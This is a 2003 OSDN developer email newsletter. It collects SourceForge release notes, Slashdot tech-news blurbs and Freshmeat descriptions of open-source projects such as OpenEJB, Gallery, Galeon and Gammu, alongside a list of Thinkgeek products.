rollouts in {} seconds, " "running mean is {}".format(i, batch_size, end_time - start_time, running_reward)) model.update(grad_buffer, rmsprop_cache, learning_rate, decay_rate) zero_grads(grad_buffer) Total running time of the script: ( 0 minutes 0.000 seconds) Gallery generated by Sphinx-Gallery
https://docs.ray.io/en/master/auto_examples/plot_pong_example.html
CC-MAIN-2020-50
refinedweb
1,364
52.15
Overview Atlassian SourceTree is a free Git and Mercurial client for Windows. Atlassian SourceTree is a free Git and Mercurial client for Mac. About BrowserLimit Browserlimit is a TurboGears2 extension meant to quickly limit access to a website only to modern browsers. BrowserLimit requires TurboGears2.1.4 or newer. Installing tgext.browerlimit can be installed both from pypi or from bitbucket: easy_install tgext.browserlimit should just work for most of the users Enabling BrowserLimit Using BrowserLimit is quite simple, you can just plug it using tgext.pluggable. If you want to avoid using tgext.pluggable for any reason it is still possible to use tgext.browserlimit by manually setting it up. At the end of your application config/app_cfg.py import tgext.browserlimit: import tgext.browserlimit tgext.browserlimit.plugme(base_config, {}) Choosing Browser Limits By default tgext.browserlimit will limit site access to browsers which have a fairly compatible HTML4 support, those include IE8, Chrome4, Firefox3.6, Safari3.2 This can be changed by specifying the base_config.browserlimit option inside your config/app_cfg.py before loading browserlimit. Valid values are: - MODERN -> Most modern browsers with top edge features - HTML5 -> Minimal HTML5 support like video and canvas - BASIC -> Good HTML4 support (the default) - MINIMAL -> Cover as much as possible (minimum IE version 7) New limits can be enabled using the base_config.browserlimits option. This must be a dictionary where the KEY is the limit name and the value is a class that implements __init__(self, user_agent) and is_met(self, environ) -> bool methods.
https://bitbucket.org/devilicecream/tgext.browserlimit
CC-MAIN-2017-30
refinedweb
250
51.44
I am having trouble with the GraphLCDIntrf and the emFile components. I created a project with the LCD interface and got it working. I then added the emFile component and added all the necessary links to the additional directories. Then when I build the project I get a build error "prj.M0120:Build error: unknown type name 'PTR_ADDR' ". I've created another project using the last version of the GraphLCDIntrf with the emFile component and didn't have this trouble. I don't know where to look or what to do in order to fix this build error. Attached is the project I'm working on so that you can see what's happening. It's not pretty because I was just testing different functions of emWin. Thanks, Matt I can not explain it, but it seems necessary to make the inclusion of the Global.h file mandatory. comment out the first and last lines in this file: //#ifndef GLOBAL_H // Guard against multiple inclusion ................. //#endif // Avoid multiple inclusion Should I be in the office tomorrow I'll give it a shot. Thanks, Thanks for the help. I tested it out this morning and it appears to be working just fine
https://community.cypress.com/thread/41962
CC-MAIN-2018-47
refinedweb
200
75.5
Masonite Events is a simple to use integration for subscribing to events. These events can be placed throughout your application and triggered when various actions occur. For example you may want to do several actions when a user signs up like: Send an email Update a section of your database These actions can all be executed with a single line of code in you controller once you have setup your listeners First we'll need to install the package using pip: $ pip install masonite-events Once installed we'll need to add the provider to our providers list: config/providers.pyfrom events.providers import EventProvider...PROVIDERS = [...EventProvider,...] This Service Provider will add a new event:listener command we can use to create new events. We'll walk through step by step on how to create one below. Masonite Events allows you to subscribe to arbitrary event actions with various event listeners. In this article we will walk through the steps on setting up listeners for a new user subscribing to our application. We can create our event listener by executing the following command: $ craft event:listener SubscribeUser This will create a new event in the app/events directory that looks like this: """ A SubscribeUser Event """from events import Eventclass SubscribeUser(Event):""" SubscribeUser Event Class """subscribe = []def __init__(self):""" Event Class Constructor """passdef handle(self):""" Event Handle Method """pass This is a very simple class. We have the __init__ method which is resolved by the container and we have a handle method, also resolved by the container. This means that we can use syntax like: from masonite.request import Request...def __init__(self, request: Request):""" Event Class Constructor """self.request = request... The subscribe attribute can be used as a shorthand later which we will see but it should be a list of events we want to subscribe to: """ A SubscribeUser Event """from events import Eventfrom package.action import SomeActionclass SubscribeUser(Event):""" SubscribeUser Event Class """subscribe = ['user.subscribed', SomeAction]def __init__(self):""" Event Class Constructor """passdef handle(self):""" Event Handle Method """pass We can listen to events simply by passing the listener into one of your applications Service Provider's boot methods. Preferably this Service Provider should have wsgi=False so that you are not continuously subscribing the same listener on every request. You likely have a Service Provider whose wsgi attribute is false but let's create a new one: $ craft provider ListenerProvider Make sure we set the wsgi attribute to False: ''' A ListenerProvider Service Provider '''from masonite.provider import ServiceProviderclass ListenerProvider(ServiceProvider):wsgi = Falsedef register(self):passdef boot(self):pass Now we can import our listener and add it to our.subscribe(SubsribeUser) This is the recommended approach over the more manual approach found below but both options are available if you find a need for one over the other. Since we have a subscribe attribute on our listener, we can simply pass the action into the subscribe method. This will subscribe our listener to the SomeAction and the user.subscribed action that we specified in the subscribe attribute of our listener class. If we don't specify the actions in the subscribe attribute, we can manually subscribe them using the listen method in our Service Provider's.listen('user.subscribed', [SubsribeUser]) Ensure that the second parameter in the listen method is a list; even if it has only a single value Now that we have events that are being listened to, we can start firing events. There are two ways to fire events. We can do both in any part of our application but we will go over how to do so in a controller method. from events import Event...def show(self, event: Event):event.fire('user.subscribed') Masonite Events also comes with a new builtin helper method: def show(self):event('user.subscribed') Both of these methods will fire all our listeners that are listening to the user.subscribed event action. As noted briefly above, we can subscribe to classes as events: from package.action import SomeActiondef show(self):event(SomeAction) This will go through the same steps as an event subscribed with a string above. We can also fire events using an * wildcard action: def show(self):event('user.*') This will fire events such as user.subscribed, user.created, user.deleted. We can also fire events with an asterisk in the front: def show(self):event('*.created') This will fire events such as user.created, dashboard.created and manager.created. We can also fire events with a wildcard in the middle: def show(self):event('user.*.created') This will fire events such as user.manager.created, user.employee.created and user.friend.created. Sometimes you will want to pass an argument from your controller (or wherever you are calling your code) to your event's handle method. In this case you can simply pass keyword arguments to your fire method like so: def show(self, event: Event):event.fire('user.subscribed', to='[email protected]', active='True') and you can fetch these values in your handle method using the argument method: class SubscribeUser(Event):""" SubscribeUser Event Class """subscribe = ['user.subscribed', SomeAction]def __init__(self):""" Event Class Constructor """passdef handle(self):""" Event Handle Method """self.argument('to') # [email protected]self.argument('active') # True
https://docs.masoniteproject.com/useful-features/events
CC-MAIN-2020-34
refinedweb
875
54.63
Quick and easy If you've used React, you have obviously passed data down from a parent component to a child using props.** This is called uni-directional data flow**. What if I showed you a little trick which could allow you to conversely pass small chunks of props from the CHILD component back up to the PARENT component? Here's the trick — very simple. We have 2 components: Parent: App.js Child: Child.js Use the following steps: Create a function inside your parent component, pass it a parameter and log that parameter using console.log . Pass the function name as props into your child component render. Invoke the function from props inside your child component. Pass in your data as an argument inside the invocation. Viola. Parent component: import Child from "./Child"; function App() { const pull_data = (data) => { console.log(data); // LOGS DATA FROM CHILD (My name is Dean Winchester... &) }; return ( <div className="App"> <Child func={pull_data} /> </div> ); } export default App; Child component: const Child = (props) => { props.func("My name is Dean Winchester & this is my brother Sammie"); return ( <> <h1>I am the Child Component!</h1> </> ); }; export default Child; It's that simple! Also, notice that inside Child.js , the use of React Fragments <> ... </> . This allows us to create fewer DOM nodes, giving our app a small performance boost. It also helps with debugging (less clutter of div s). Thanks for reading — I hope this provided some good value. Visit me at PJCodes.com. Further Reading Composable Link Component that Works in Any React Meta-Framework
https://plainenglish.io/blog/how-to-pass-props-from-child-to-parent-component-in-react
CC-MAIN-2022-40
refinedweb
257
60.92
Out-of-bounds access (ARRAY_VS_SINGLETON)Somebody told me this and I am agree with this alternative.. You cannot store the result of sprintf... Out-of-bounds access (ARRAY_VS_SINGLETON)Need little help.. [code] #include <iostream> int main() { int bit = 1; int init = 0xf ^ (1 <<... Resource leak..Yes. Smart pointer seems to be optimal solutions to avoid these kind of leaks. Thanks. Resource leak..[code] #include<iostream> int* func_b() { int *c = new int; return c; } int main() { int* b ... Interesting puzzle + function pointers?I think my question is not clear to everyone here who is trying to answer it. Let me try to explain ...
http://www.cplusplus.com/user/bhargavah/
CC-MAIN-2017-34
refinedweb
102
69.58
#include <string> Go to the source code of this file. A plugin is a dynamic library which has a unique name and can be loaded in a running application. In case the loading is done by an Orocos TaskContext, the plugin is notified of the loading TaskContext. A plugin can reject to load, in which case the library should be unloaded from the application again. Once loaded, a plugin remains in the current process until the process exits. Definition in file Plugin.hpp. Return the unique name of this plugin. No two plugins with the same name will be allowed to live in a single process. Instructs this plugin to load itself into the application. Implement in this function any startup code your plugin requires. This function should not throw.
http://people.mech.kuleuven.be/~orocos/pub/stable/documentation/rtt/v1.8.x/api/html/Plugin_8hpp.html
crawl-003
refinedweb
130
76.52
1.1. INSTALL THE PACKAGES Lets install the packages and download the data using the commands as shown below. # Install the packages # !pip install !pip install fastai==0.7.0 !pip install torchtext==0.2.3 !pip install opencv-python !apt update && apt install -y libsm6 libxext6 !pip3 install !pip3 install torchvision # Download the Data to the required folder !mkdir data !wget -P data/ !wget -P data/ !tar -xf data/VOCtrainval_06-Nov-2007.tar -C data/ !unzip data/PASCAL_VOC.zip -d data/ !rm -rf data/PASCAL_VOC.zip data/VOCtrainval_06-Nov-2007.tar %matplotlib inline %reload_ext autoreload %autoreload 2 !pip install Pillow from fastai.conv_learner import * from fastai.dataset import * from pathlib import Path import json import PIL from matplotlib import patches, patheffects Lets check what’s present in our data. We will be using the python 3 standard library pathlib for our paths and file access . 1.2. KNOW YOUR DATA USING Pathlib OBJECT. The data folder contains different versions of Pascal VOC . PATH = Path('data') list((PATH/'PASCAL_VOC').iterdir()) # iterdir() helps in iterating through the directory of PASCAL_VOC - The PATHis an object oriented access to directory or file. Its a part of python library pathlib. To know how to leverage the use of pathlibfunction do a PATH.TAB. - Since we will be working only with pascal_train2007.json, Let’s check out the content of this file. training_json = json.load((PATH/'PASCAL_VOC''pascal_train2007.json').open()) # training_json is a dictionary variable. # As we can see Pathlib object has an open method . # json.load is a part of Json (Java Script Object Notation) library that # we have imported earlier. training_json.keys() This file contains the Images , Type , Annotations and Categories. For making use of Tab Completion , save it in appropriate variable name. IMAGES,ANNOTATIONS,CATEGORIES = ['images', 'annotations', 'categories'] Lets see in detail what each of these has in detail:- - The IMAGES consist of image name , its height , width and image id. - The ANNOTATIONS consist of area, bbox(bounding box), category_id (Each category id has a class or a name associated with it ). - Some of the images has polygon segmentation i.e the Bounding box around the object in the image. Its not important to our discussion. - The ignore flag says to ignore the object in the image if the ignore flag=1 (True). - The CATEGORIES consists of class(name) and an ID associated with it. For easy access to all of these , lets convert the important stuffs into dictionary comprehension and list comprehension. FILE_NAME,ID,IMG_ID,CATEGORY_ID,BBOX = 'file_name','id','image_id','category_id','bbox' categories = {o[ID]:o['name'] for o in training_json[CATEGORIES]} # The categories is a dictionary having class and an ID associated with # it. # Lets check out all of the 20 categories using the command below categories training_filenames = {o[ID]:o[FILE_NAME] for o in training_json[IMAGES]} training_filenames # contains the id and the filename of the images. training_ids = [o[ID] for o in training_json[IMAGES]] training_ids # This is a list comprehension. Now , lets check out the folder where we have all the images . list((PATH/'VOCdevkit'/'VOC2007').iterdir()) # The JPEGImages in red is the one with all the Images in it. JPEGS = 'VOCdevkit/VOC2007/JPEGImages' IMG_PATH = PATH/JPEGS # Set the path of the Images as IMG_PATH list(IMG_PATH.iterdir())[:5] Note:- Each image has an unique id associated with it as shown above. 1.3. BOUNDING BOX The main objective here is to bring our bounding box to proper format such that which can be used for plotting purpose. The bounding box coordinates are present in the annotations. A bounding box is a box around the objects in an Image. Earlier the Bounding box coordinates represents (column, rows, height, width). Check out the image below. - After passing the coordinates via hw_bb() function which is used to convert height_width to bounding_box, we get the coordinates of the top left and bottom right corner and in the form of (rows and columns). def hw_bb(bb): return np.array([bb[1], bb[0], bb[3]+bb[1]-1, bb[2]+bb[0]-1]) - Now , we will create a dictionary which has the image id as the key and its bounding box coordinate and the category_id as the values. # Python's defaultdict is useful any time you want to have a default # dictionary entry for new keys. If you try and access a key that doesn’t # exist, it magically makes itself exist and # it sets itself equal to the return value of the function you specify # (in this case lambda:[]). training_annotations = collections.defaultdict(lambda:[]) for o in training_json[ANNOTATIONS]: if not o['ignore']: bb = o[BBOX] bb = hw_bb(bb) training_annotations[o[IMG_ID]].append((bb,o[CATEGORY_ID])) - In the above chunk of code, we are going through all the annotations , and considering those which doesn’t say ignore . After that we append it to a dictionary where the values are the Bounding box (bbox )and the category_id(class) to its corresponding image id which is the key. - One problem is that if there is no dictionary item that exist yet, then we can’t append any list of bbox and class to it . To resolve this issue we are making use of Python’s defaultdict using the below line of code. training_annotations = collections.defaultdict(lambda:[]) - Its a dictionary but if we are accessing a key that isn’t present , then defaultdictmagically creates one and sets itself equals to the value that the function returns . In this case its an empty list. So every time we access the keys in the training annotations and if it doesn’t exist , defaultdictmakes a new empty list and we can append to it. SUMMARY OF THE USEFUL IMAGE RELATED INFORMATION Lets get into the details of the annotations of a particular image. As we can see in the snapshot below . - We take a particular image. - Get its annotation i.e the Bounding Box and the Class of the Object in the BBox. It means what are the objects present in the class along with the coordinates of the objects. - Check what does that class refers to in the below example. In this case the class or the category is a car. Some libraries take VOC format bounding boxes, so the bb_hw() function helps in resetting the dimension into original format: bb_voc = [155, 96, 196, 174] bb_fastai = hw_bb(bb_voc) # We won't be using the below function for now . def bb_hw(a): return np.array([a[1],a[0],a[3]-a[1]+1,a[2]-a[0]+1]) read original article here
https://coinerblog.com/single-object-detection-e65a537a1c31/
CC-MAIN-2019-26
refinedweb
1,084
58.58
Passing Task attributes to main processJKoslowski Jan 18, 2017 9:55 AM I am building an onboarding process and we have two groups of technicians (Application support and Technical Support). At one step in the process it creates two tasks and assigns one to the Technical Support group and the other to the Application Support group. Each group then completes their tasks and marks it as complete. I'd like to then display these fields in each task in the main Onboarding process window but am unsure the best way to do this. I've created their own task process for each group so that I can set different flags and send different notifications when each group has completed their tasks. Thoughts? Summary: I want to display attributes from two different tasks on the main window. 1. Re: Passing Task attributes to main processrs090 Jan 18, 2017 11:53 AM (in response to JKoslowski) Are the tasks already visible as a collection at the bottom of your onboarding window or are the tasks and onboarding screen two separate objects completely at this point in that the techs can't get to the task from the onboarding window? 2. Re: Passing Task attributes to main processJKoslowski Jan 18, 2017 12:00 PM (in response to rs090) Correct, they are view able as a collection at the bottom. However, I'd like to have them displayed on the onboarding screen. I'm assuming I need to copy the attributes over to the onboarding object somehow. 3. Re: Passing Task attributes to main processrs090 Jan 18, 2017 12:26 PM (in response to JKoslowski) I don't know of a way you could add additional fields directly from the collection, but you can change the data that's displayed on the collection tab which may be want your wanting. See this How to: Set Default Query for Collections in Web Desk - Changing the Columns you see in the tab Another option and this is just an idea for testing is to drag your task object on to your onboarding module in object designer, when prompted choose no to creating a collection. This would create an additional relationship to the task object so in window manager on your onboarding window you would now be able to select the individual fields from the task(s) modules. Not sure if it would show the right task info though but maybe worth a quick test. 4. Re: Passing Task attributes to main processJKoslowski Jan 19, 2017 3:05 PM (in response to JKoslowski)1 of 1 people found this helpful Worked with Mr. Roche at Landesk and we ended up creating a calculation on the Activity.NetworkLogin attribute to pull the networklogin attribute from the activity tasks collection. The calculation updates when a task is marked as complete and skips any null entries. import System static def GetAttributeValue(Activity): Value = '' for Tasks in Activity.Tasks: if Tasks._NetworkLogin != null: Value = Tasks._NetworkLogin return Value Dependency: Tasks/Completions So I just have to do this for each field that gets passed to the main object from the tasks. Calculation Writing Tutorial - 4. Working with Collections and Loops
https://community.ivanti.com/thread/34711
CC-MAIN-2018-30
refinedweb
529
58.42
Lower Bounds Wildcard instantiations actually allow another type of bound called a lower bound as well. A lower bound is specified with the keyword super and requires that instantiations be of a certain type or any of its supertypes, up to upper bound of Type variable or Object. Consider the following classes and statement : The wildcard instantiation Gen<? super Data3> obj123 creates a type that can hold any instantiation of Gen on the type Data3 or any of its supertypes. That means the wildcard type can be assigned one of only four types: Gen<Data3> , Gen<Data2> , Gen<Data1> or Gen<Object>. We have cut off the object inheritance hierarchy after four generations. No further subclasses of Data3 can be used. We know that the elements of any instantiation matching our lower bounded wildcard must be a supertype of the lower bound. So, we can write to the object through our lower bound wildcard instantiation obj123. That object must be a type Data3 or its subclass. For example : We cannot write supertypes of Data3, because the compiler do not know what supertype of Data3 the elements are. For example : We cannot read the object as any specific type from the lower bound wildcard instantiation, we can read the object type as upper bound of Type variable. Because the compiler do not know what supertype of the specified the elements are. So, we can always read the type as Object through our wildcard instantiation. The type Object is the default upper bound. For example: One last thing about lower bounds: only the wildcard instantiation syntax can use the super keyword to refer to lower bounds. Bounds of type variables in generic class declarations cannot have lower bounds: Program class Data1 { int da1; Data1(int d1) { da1 = d1; } } class Data2 extends Data1 { int da2; Data2(int d1, int d2) { super(d1); da2 = d2; } } class Data3 extends Data2 { int da3; Data3(int d1, int d2, int d3) { super(d1, d2); da3 = d3; } } class Data4 extends Data3 { int da4; Data4(int d1, int d2, int d3, int d4) { super(d1, d2, d3); da4 = d4; } } class Data5 extends Data4 { int da5; Data5(int d1, int d2, int d3, int d4, int d5) { super(d1, d2, d3, d4); da5 = d5; } } class Gen<T> { T tarray[]; Gen(T tar[]) { tarray = tar; } void setT(int pos, T t) { tarray[pos] = t; } T getT(int pos) { return tarray[pos]; } } public class Javaapp { public static void main(String[] args) { Gen<? super Data3> data123 = new Gen<Data2>(new Data2[5]); data123.setT(0, new Data3(10, 20, 30)); data123.setT(1, new Data4(10, 20, 30, 40)); data123.setT(2, new Data5(10, 20, 30, 40, 50)); } }
https://hajsoftutorial.com/java-lower-bounds/
CC-MAIN-2019-47
refinedweb
446
59.94
O | S | D | N NEWSLETTER June 10, 2003 DEVELOPER SERIES The 'Developer Series' Newsletter is developed to bring Open Source related content to a user with a focus for development with Open Source If you'd like to receive more content relating to Open Source subscribe at ============================================================== Sponsored by Thinkgeek ============================================================== Thinkgeek Cube Goodies: Luminglass Computing: ThermalTake Aquarius II CPU Cooler Computing: ThermalTake HardCano 10 Computing: ThermalTake Xaser PC Cases Gadgets: Squid Light Interests: I'm blogging this. Interests: Tempt me. Gadgets: USB Memory Watch Cube Goodies: R/C Hovercraft Caffeine: Octane Energy Gel Gadgets: Yes Solstice Computing: TouchStream LP ZeroForce Keyboard Cube Goodies: Duct Tape Wallet Computing: Ideazon Zboard Gadgets: Inova X5 LED Flashlights Tshirts: fork agent smith Caffeine: Jo Mints w/Guarana Tshirts: Follow the white rabbit. Cube Goodies: Midnight blue 'geek.' glass Tshirts: M.A.D. Sourceforge OpenEJB 0.9.2 released The 0.9.2 release is one that the whole team is quite proud of. OpenEJB 0.9.0 marked are first release with special Tomcat embedded support. Thanks to all the user feedback that support has just gotten better and better. The 0.9.2 release contains a neat surprise for OpenEJB/Tomcat users -- TOOLS! The new integration features a webapp with a setup verifier, JNDI browser, EJB viewer, Class browser, and even an Object invoker! You can browse the OpenEJB namespace and know right away exactly where the ejb is and what it is called. When you find one you like, just click it and it will open up into the EJB viewer. While there you can check out it's home, remote and bean classes in the class browser. The Object invoker allows you to actually create and invoke your EJBs without writing a single line of code. OpenEJB 0.9.2 also contains a new openejb.base variable to complement the openejb.home variable. The openejb.base variable allows you to have several configurations of OpenEJB all running against the same OpenEJB install. This makes using OpenEJB in IDEs like Eclipse or NetBeans even easier. Move the openejb_loader-0.9.2.jar into your project's lib directory, set the openejb.base, and you'll be debugging your EJB apps front-to-back without the need for remote debugging support or special editor plug-ins. Thanks to all the OpenEJB users for all the great ideas! You speak, we listen. LTI-Lib Version Beta 1.9.3 released LTI-Lib is an object oriented computer vision library written in C++ for Windows/MS-VC++ and Linux/gcc. It provides lots of functionality to solve mathematical problems, many image processing algorithms, some classification tools and much more. This release provides new functors and features, many bug fixes and more documentation. Download -------- You can get this and previous releases from: Homepage -------- For more information please visit our homepage: ChangeLog --------- For more details about the changes in this release please visit the ChangeLog page at: Acknowledgments --------------- Thanks to all developers at the Chair of Computer Science: Suat Akyol, Pablo Alvarado, Daniel Beier, Axel Berner, Ulrich Canzler, Peter Doerfler, Thomas Erger, Holger Fillbrandt, Peter Gerber, Claudia, Goenner, Xin Gu, Michael Haehnel, Christian Harte, Bastian Ibach, Torsten Kaemper, Thomas Krueger, Frederik Lange, Henning Luepschen, Peter Mathes, Alexandros Matsikis, Bernd Mussman, Jens Paustenbach, Norman Pfeil, Jens Rietzschel, Daniel Ruijters, Thomas Rusert, Stefan Syberichs, Guy Wafo Moudhe, Ruediger Weiler, Jochen Wickel , Benni Winkler, Xinghan Yu, Marius Wolf, Joerg Zieren Gallery v1.3.4 Release Candidate 2 available Gallery v1.3.4 Release Candidate 2 - This is the second (and, we fully expect, final) *release candidate* for Gallery v.1.3.4. Changes from RC1 essentially amount to small fixes for errors discovered since the first release candidate in the backup_albums.php script and the new "custom fields" code. Gallery is slick, intuitive web based photo gallery with authenticated users and privileged albums. Easy to install, configure and use. Photo management includes automatic thumbnails, resizing, rotation, etc. User privileges make this great for communities. Download it: Read more about this release candidate: phpwsBB 0.1.0 released phpwsBB is a native bulletin board module for the phpWebSite content management system, version 0.9.2 or later. Today we release version 0.1.0 of phpwsBB. Features include anonymous posting, message editing and deletion for registered users, thread locking and message forking for admins, and ... well that's probably it. Be sure you have the latest version of phpWebSite installed: and then download phpwsbb from:. Aleph One 2003-05-30 Mac OS X Carbon and Windows releases Aleph One plays Marathon 2, Marathon Infinity, and third-party content on a wide array of platforms with numerous enhancements. The new Mac OS X Carbon and Windows SDL 2003-05-30 releases add significantly improved Internet play, Lua scripting, Speex compression for realtime network audio (making it much more practical in Internet games), an anisotropic filtering option on video cards that support it, and more. Slashdot Jabber Gathers Steam In Australia [0]Jeremy Lunn writes "Jabber is on a rolling start in Australia with this article featured in The Age in Melbourne (and the Sydney Morning Herald) '[1]Jabbering classes push for more power' and the formation of [2]Jabber Australia." Links 0. 1. 2. Linux Rocket Blasts Off This Fall [0]HardcoreGamer writes "An Oregon amateur rocket group, the [1]Portland State Aerospace Society, plans to . The group will present a [3]paper ([4]HTML | [5]PDF ) on the use of free software in rocketry at [6]Usenix 2003. The real question is whether their network card will survive 10 seconds at 15 Gs!" Links 0. 1. 2. 3. 4. 5. 6. UCITA Stalled At State Level [0]OscarGunther writes "Four states have passed anti-UCITA laws and Massachusetts may soon become the fifth. Meanwhile, only two states have adopted the Uniform Computer Information Transactions Act, which gives software vendors all the benefits and none of the burdens of the consequences of publishing their software. The [1]details can be found at ComputerWorld and an [2]opinion piece by Frank Hayes can be found here." Links 0. mailto:[EMAIL PROTECTED] 1. 2. Foundstone Shoe On Other Foot [0]Cimmer writes "One of the premier hack shops (to pun or not to pun) gets busted for unethically ethically hacking. After filing a lawsuit against former employee JD Glaser for supposedly [1]jacking company source code, Foundstone[2] gets nailed for massive internal software piracy. Tonight's entree: Foot in Mouth." Links 0. mailto:[EMAIL PROTECTED] 1. 2. AAC Put To The Test [0]technology is sexy writes "Following the increasing popularity of AAC in [1]online music stores and the growing amount of implementations in software and [2]hardware, the format is now being put to the test. How well does Apple's implementation fare against [3]Ahead Nero, Sorenson or the Open Source [4]FAAC at the popular bitrate of 128kbps? Find out for yourself and help by submitting the results. You can find instructions on how to participate [5]here. The best AAC codec gets to face MP3, MP3Pro, Vorbis, MusePack and WMA in the next test. [6]Previous test results at 64kbps [7]can be found here." Links 0. mailto:[EMAIL PROTECTED] minus poet 1. 2. 3. 4. 5. 6. 7. SuSE Linux Desktop 1.0 Reviewed [0]LinuxLasVegas writes "SuSE [1]announced a new release today titled "[2]SuSE Linux Desktop 1.0". The distro is built on SuSE Linux Enterprise Server 8.x technology and comes with Crossover Office 2.0. Mad Penguin has the [3]first review of this release. From what I read, it seems like a good release, but for the $600 price tag, I'm not sure if it would be worth the jump..." Links 0. 1. 2. 3. Inappropriate Spam Reaching Children? [0]peeweejd writes "Wired has an article stating that four out of five children [1 [2]survey originator Symantec's press release - and yes, Symantec does sell mail filtering software. Links 0. mailto:[EMAIL PROTECTED] 1. 2. Implementing WiFi in the Real World John Jorsett writes "Seduced, MSN author Paul Boutin hired a Wi-Fi engineer [0]to help him bathe his property in 802.11 waves, using only mass-market consumer hardware." Links 0. Why Johnny Can't Handwrite [0]theodp writes "Handwriting experts fear that the wild popularity of e-mail and IM, particularly among kids, [1." Links 0. mailto:[EMAIL PROTECTED] 1. Which Red Hat Should Be Worn in the Enterprise? [0." Links 0. mailto:[EMAIL PROTECTED] Freshmeat 3D Battle Go 1 3D Battle Go is a 3D arcade version of the ancient Chinese board game Go. It expands Go using a tetrahedral lattice structure that is similar enough in certain aspects to a 2D grid that the game is fun and playable, but definately not isomorphic to the 2d structure. It uses OpenGL and works much better with a 3D graphics card. adcfw-log 0.8.2 ad. ANTLR plugin for Eclipse 1.0.4 This project adds plugins for the lexer/parser generator ANTLR to the Eclipse platform. The plugins provide a grammar file editor with syntax highlighting, outline view and a project nature with incremental builder. Bitstream Vera TrueType font RPM 1 The Bitstream Vera TrueType font RPM installs the Vera font in /usr/share/fonts and symlinks it into the OpenOffice font directory. It automatically makes the fonts recognizable by the system, and sets it as the default font for Sans and Sans-Serif font types. Blassic 0.5.7 Blassic is a classic Basic interpreter. The line numbers are mandatory, and it has PEEK & POKE. The main goal is to execute programs written in old interpreters, but it can be used as a scripting language. BRL 2.2 BRL is a language designed for server-side WWW-based applications, particularly database applications. It is based on Scheme, which makes the syntax extremely simple yet powerful. This implementation is a Java Servlet using the Kawa Scheme compiler. cacti 0.8.1 ewolf 0.9 beta1 Cewolf can be used inside a Servlet/JSP-based Web application to embed complex graphical charts of all kinds (e.g. line, pie, bar chart, plots, etc.) into a Web page. It provides a full-featured tag library to define all properties of the chart (colors, strokes, legend, etc.), thus the JSP which embedds the chart is not polluted with any Java code. Everything is described with XML-compliant tags. cglib 1.0 cglib is a set of utility classes that can be used to generate and load Java classes at runtime. Civil 0.82 Civil is a cross-platform, turnbased, networked strategy game that allows players to take part in scenarios set during the American Civil war. It simulates battles on a company level (a company is roughly 100 men). COMMpositeur 030609 COMMpositeur is a simple document management system implemented as a collection of modules for the phpGroupWare application framework. It helps electronic journals to manage metadata about articles and to automate the generation of published formats (HTML and PDF) from articles in a raw format (RTF) using external tools. CvsKnit 0.9.9 CvsKnit is a CVS automation suite to knit up various CVS repositories from existing source packages. This may be useful for starting revision management with CVS, figuring out when a file had been added, modified, or removed, or for browsing source diffs or annotating between packages via a Web interface. D Parser 1.2 The D Parser is a scannerless GLR parser generator based on the Tomita algorithm. It is self-hosted and very easy to use. Grammars are written in a natural style of EBNF and regular expressions and support both speculative and final actions. DB_DataContainer 0.12.0 DB_DataContainer is a PEAR-compliant database persistence layer and data encapsulation class. It encapsulates the behavior required to make objects persistent, including loading, saving, and deleting objects in a persistent store. It currently supports relational databases and uses PEAR DB for database abstraction. DSPAM 2.6.0.67. Ebotula 0.1.7 Ebotula is an IRC bot for administration tasks in one or more channels. He has four access levels. The top level is the bot master. In this level have a user complete acces of all functions. The next level is the channel owner. He is the administrator in one channel. The other both are friends and other users. The bot is a multithread applikation and can execute simultaneously more commands. The data are contained in gdbm hash files. Echo Web Application Framework 1.0 Echo is a framework for developing object-oriented, event-driven Web applications in Java. Echo removes the developer from having to think in terms of "page-based" applications and enables him/her to develop applications using the conventional object-oriented and event-driven paradigm for user interface development. Knowledge of HTML, HTTP, and JavaScript is not required. Tutorials, white papers, and full API documentation are available. EJBSpaces Alpha 4 EJBSpaces is an implementation of Sun's JavaSpaces, which is accessed through a J2EE application server such as WebLogic, JBoss, or WebSphere. It provide a business-centric enterprise scale implementation of JavaSpaces, and flattens the learning curve for experienced application developers by using JNDI rather than Discovery. It also uses built-in features such as RMI and HTTP. Emilia Pinball Project 0.3.0 (Alpha) The Emilia Pinball Project is a pinball simulator for Linux and other Unix systems. There is only one level to play with, but it is very addictive. EMS MySQL Utils 1.4.0.1 (Import). EMS PostgreSQL Utils 1.4.0.1 (Import). Epiphany-browser 0.7.0 Epiphany is a GNOME web browser based on the Mozilla rendering engine. Its goals are simplicity, standards compliance, and integration with GNOME. Fast File Search 1.0.3 Fast File Search crawls FTP servers and SMB shares (Windows shares and UNIX systems running Samba) and stores the information about files to a database. A Web interface is then used for searching files. Firestorm NIDS 0.5.3 Firestorm is an extremely high performance network intrusion detection system (NIDS). At the moment, it just a sensor but there are plans are to include real support for analysis, reporting, remote console, and on-the-fly sensor configuration. It is fully pluggable and hence extremely flexible. fnord httpd 1.8 fnord httpd is a small HTTP server (15k static binary). It is fast, and supports sendfile and connection keep-alive, virtual domains, content- ranges, and IPv6. It does transparent content negotiation for special cases (html - html.gz, or gif - png). FollowMeIP 1.3 FollowMeIP is a small client that allows you to retrieve the IP address of your machine over the Web. It works by periodically sending your IP address to the FollowMeIP server, from where you can retrieve it using a password. It is ideal for people that are running servers on dynamic IP connections, or are away from home and want to access their machines via TCP/IP. Fung-Calc 1.3.0 (Stable) Fung-Calc is an advanced yet easy to use graphing calculator written using the Qt libraries. It supports various graphing modes in both 2D and 3D. It combines all the features of a full-blown mathematical analysis package with ease of use. Galeon 1.3.5 (Unstable) Galeon is a GNOME Web browser based on Gecko (the Mozilla rendering engine). It is fast, has a light interface, and is fully standards-compliant. Galeon 1.2.11 Galeon is a GNOME Web browser based on Gecko (the Mozilla rendering engine). It is fast, has a light interface, and is fully standards-compliant. gameping 1.4 Gameping is a command-line utility used to monitor games servers. It returns the average player's ping and loss. These two pieces of information are useful for evaluating the quality of a server. Gammu 0.77 (Development) Gammu (formerly known as MyGnokii2) is cellular manager for various mobile phones and modems. It currently supports Nokia 3210, 33xx, 3410, 35xx, 51xx, 5210, 5510, 61xx, 62xx, 63xx, 6510, 6610, 6800, 71xx, 7210, 82xx, 83xx, 8910, 9110, and 9210, and AT devices (such as Siemens, Alcatel, Falcom, WaveCom, IPAQ, and other). It has a command line version with many functions for ringtones, phonebook, SMS, logos, WAP, date/time, alarm, calls, etc. It can also make full backups and restore them. It works on various Unix systems (like Linux) and Win32. ggcov 0.1.4 Ggcov is a GTK+ GUI for exploring test coverage data produced by C programs compiled with gcc -fprofile-arcs -ftest-coverage. It's basically a GUI replacement for the gcov program that comes with gcc. GkrellMMS 2.1.11 GkrellMMS is a plugin for controlling XMMS from within GKrellM. GNU MIX Development Kit 1.0. GPSFET 1.0.0 